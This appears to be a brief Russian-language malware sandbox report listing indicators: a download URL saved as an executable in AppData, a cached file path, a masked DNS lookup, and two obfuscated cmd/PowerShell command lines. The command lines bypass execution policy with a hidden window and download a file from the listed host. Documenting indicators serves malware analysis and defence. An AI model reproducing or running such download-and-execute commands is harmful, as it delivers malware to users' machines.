Техническая информация
- http://www.fopeioaas.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Pow^eRsh^ElL.eX^e ^-E^xECut^Ion^poL^I^c^y ^ByPaSs -N^O^ProFIlE -w^IN^dow^stylE Hi^Dd^en (NeW^-^obje^ct s^Y^stEM^.^neT^.^W^EBcLi^ENt).^DO^WNl^o^a^dFi^Le(^'http://www.fopeioaas.t...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- DNS ASK fo###oaas.top
- '<SYSTEM32>\cmd.exe' /C "Pow^eRsh^ElL.eX^e ^-E^xECut^Ion^poL^I^c^y ^ByPaSs -N^O^ProFIlE -w^IN^dow^stylE Hi^Dd^en (NeW^-^obje^ct s^Y^stEM^.^neT^.^W^EBcLi^ENt).^DO^WNl^o^a^dFi^Le(^'http://www.fopeioaas.t... (со скрытым окном)